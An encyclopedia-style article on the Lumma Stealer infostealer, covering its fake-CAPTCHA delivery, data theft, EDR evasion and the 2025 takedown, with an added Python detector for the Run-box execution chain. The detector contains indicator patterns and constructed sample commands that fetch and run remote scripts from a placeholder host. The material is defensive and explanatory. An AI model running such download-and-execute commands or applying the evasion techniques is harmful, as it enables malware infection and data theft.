Lumma Stealer

From HandWiki

Lumma Stealer (also known as LummaC2) is an information-stealing malware-as-a-service (MaaS) program that targets Microsoft Windows.

Technical overview

Lumma Stealer is distributed by affiliates through a range of campaigns, including phishing emails, malvertising that poses as legitimate software downloads, and compromised websites. It is frequently delivered through fake CAPTCHA "verification" pages, which copy a command to the clipboard and instruct the visitor to open the Windows Run dialog and paste it, so that the victim launches the loader themselves.[1] Once running, it harvests data from web browsers, cryptocurrency wallets and chat applications, as well as files from the user's profile.[2] Stolen data is sent to a set of hard-coded command-and-control (C2) servers; if none of them can be reached, the malware falls back to Telegram, Dropbox and Steam, which serve as dead-drop resolvers from which it retrieves replacement C2 addresses.[3]
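The Run-dialog lure described above leaves a characteristic process chain: a command typed into the Run box is started by explorer.exe, so a script host spawned by explorer.exe with a hidden-window flag, an encoded command or a remote URL on its command line is a strong signal. The following detector is an added example written for this article, not Lumma's code and not taken from any of the cited vendor write-ups; the process-creation records, the hostnames (reserved .invalid names) and the encoded payload are all constructed for the example.

```python
"""Heuristic detection of the Run-box execution chain used by fake-CAPTCHA lures.

Added example; not Lumma's code. It relies on one documented Windows
behaviour: a command entered in the Run dialog is launched by explorer.exe.
All event records below are constructed for the example.
"""
import base64
import re
from dataclasses import dataclass
from typing import Optional

# Binaries a pasted Run-box one-liner would realistically invoke.
SCRIPT_HOSTS = {
    "powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe",
    "cscript.exe", "curl.exe", "certutil.exe", "bitsadmin.exe",
}

# (pattern, label) pairs; each label is reported at most once per string.
INDICATORS = [
    (r"(?i)-w(?:indowstyle)?\s+hidden", "hidden window"),
    (r"(?i)-(?:e|ec|enc|encodedcommand)\s+[A-Za-z0-9+/=]{20,}", "encoded command"),
    (r"(?i)https?://", "remote URL"),
    (r"(?i)\b(?:iex|invoke-expression|iwr|irm|invoke-webrequest|"
     r"invoke-restmethod|downloadstring)\b", "download-and-execute cmdlet"),
    (r"(?i)\bmshta\b", "mshta"),
]


@dataclass(frozen=True)
class ProcessEvent:
    """Minimal process-creation record (the fields a Sysmon event ID 1 or
    Windows security event 4688 would supply)."""
    parent_image: str
    image: str
    command_line: str


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def indicators(text: str) -> list[str]:
    return [label for pattern, label in INDICATORS if re.search(pattern, text)]


def decode_encoded_command(command_line: str) -> Optional[str]:
    """PowerShell's -EncodedCommand takes Base64 of UTF-16LE text; return
    the plaintext, or None when there is no decodable argument."""
    match = re.search(r"(?i)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{20,})",
                      command_line)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(event: ProcessEvent) -> list[str]:
    """Return the indicators that make this event look like a pasted Run-box
    command; an empty list means the event is not flagged."""
    if basename(event.parent_image) != "explorer.exe":
        return []
    if basename(event.image) not in SCRIPT_HOSTS:
        return []
    reasons = indicators(event.command_line)
    decoded = decode_encoded_command(event.command_line)
    if decoded is not None:
        # Indicators hidden inside -EncodedCommand are scanned after decoding.
        reasons += [f"{label} (in decoded command)"
                    for label in indicators(decoded) if label != "encoded command"]
    return reasons


# Constructed sample events (hypothetical lure host: lure.invalid).
_ENCODED = base64.b64encode(
    "iex (iwr 'https://lure.invalid/x.ps1')".encode("utf-16-le")).decode()

SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -w hidden -c \"iex (iwr 'https://lure.invalid/verify.txt')\""),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\mshta.exe",
                 "mshta https://lure.invalid/captcha.hta"),
    ProcessEvent(r"C:\Windows\explorer.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 f"powershell -nop -w hidden -enc {_ENCODED}"),
    ProcessEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\notepad.exe",
                 "notepad.exe C:\\Users\\alice\\notes.txt"),
    ProcessEvent(r"C:\Windows\System32\cmd.exe",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "powershell -File C:\\scripts\\backup.ps1"),
]

if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        verdict = analyze(event)
        print(f"{basename(event.image):16} {'FLAGGED' if verdict else 'ok':8} {verdict}")
```

The parent-process requirement is what separates this from a generic "suspicious PowerShell" rule: an administrator's script launched from a console has a different parent, so it is not flagged even when it fetches a URL. In production the same logic would be fed from Sysmon or a SIEM rather than from the inline records.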

Lumma Stealer is heavily obfuscated and uses process hollowing, injecting its payload into a legitimate process so that the malicious code runs under a trusted program's name and evades detection. It also delays execution until it has observed human-like activity: it samples the cursor position several times and, using a trigonometric check on the angles between successive movements, proceeds only when the motion resembles a real user's rather than the static or randomly jumping cursor of a sandbox.[4] Rather than calling the Windows API, it issues direct system calls, which bypasses the user-mode hooks that many EDR products place on ntdll.dll.[5]

History

Lumma is believed to have first appeared for sale on cybercrime forums in 2022.[6]

From March to May 2025, Microsoft identified over 394,000 Windows computers infected with Lumma.[7] In 2025, Lumma was the second most common malware family uploaded to ANY.RUN and the third most common on MalwareBazaar.[8][9] In May 2025, Microsoft announced that, acting under a US court order and in coordination with the US Department of Justice and international law-enforcement partners, it had seized or blocked about 2,300 domains associated with Lumma's infrastructure.[10] Although the operators resumed activity, the disruption was believed to have damaged their reputation among customers.[11] Between June and July 2025, activity associated with Lumma rebounded.[12]

References

  1. McAfee Labs. "Behind the CAPTCHA: A Clever Gateway of Malware". https://www.mcafee.com/blogs/other-blogs/mcafee-labs/behind-the-captcha-a-clever-gateway-of-malware/
  2. Microsoft Security Blog. "Lumma Stealer: Breaking down the delivery techniques and capabilities of a prolific infostealer". 2025-05-21. https://www.microsoft.com/en-us/security/blog/2025/05/21/lumma-stealer-breaking-down-the-delivery-techniques-and-capabilities-of-a-prolific-infostealer/
  3. Cybereason Security Services Team. "Your Data Is Under New Lummanagement: The Rise of LummaStealer". https://www.cybereason.com/blog/threat-analysis-rise-of-lummastealer
  4. akerr. "Analyzing LummaC2 stealer's novel Anti-Sandbox technique: Leveraging trigonometry for human behavior detection". Outpost24, 2023-11-20. https://outpost24.com/blog/lummac2-anti-sandbox-technique-trigonometry-human-detection/
  5. Palo Alto Networks. "A Deep Dive Into Malicious Direct Syscall Detection". 2024-02-13. https://www.paloaltonetworks.com/blog/security-operations/a-deep-dive-into-malicious-direct-syscall-detection/
  6. Bitsight. "Lumma Stealer Is Out… of Business!". https://www.bitsight.com/blog/lumma-stealer-is-out-of-business
  7. Masada, Steven. "Disrupting Lumma Stealer: Microsoft leads global action against favored cybercrime tool". Microsoft On the Issues, 2025-05-21. https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/
  8. ANY.RUN. "Malware Trends Tracker". https://any.run/malware-trends/
  9. The Spamhaus Project. "Malware Digest: MalwareBazaar". https://www.spamhaus.org/malware-digest/#malwarebazaar
  10. Masada, Steven. "Disrupting Lumma Stealer: Microsoft leads global action against favored cybercrime tool". Microsoft On the Issues, 2025-05-21. https://blogs.microsoft.com/on-the-issues/2025/05/21/microsoft-leads-global-action-against-favored-cybercrime-tool/
  11. Dark Reading. "LummaC2 Fractures as Acreed Malware Becomes Top Dog". https://www.darkreading.com/remote-workforce/lummac2-fractures-acreed-malware-top-dog
  12. Trend Micro. "Back to Business: Lumma Stealer Returns with Stealthier Methods". 2025-07-22. https://www.trendmicro.com/en_us/research/25/g/lumma-stealer-returns.html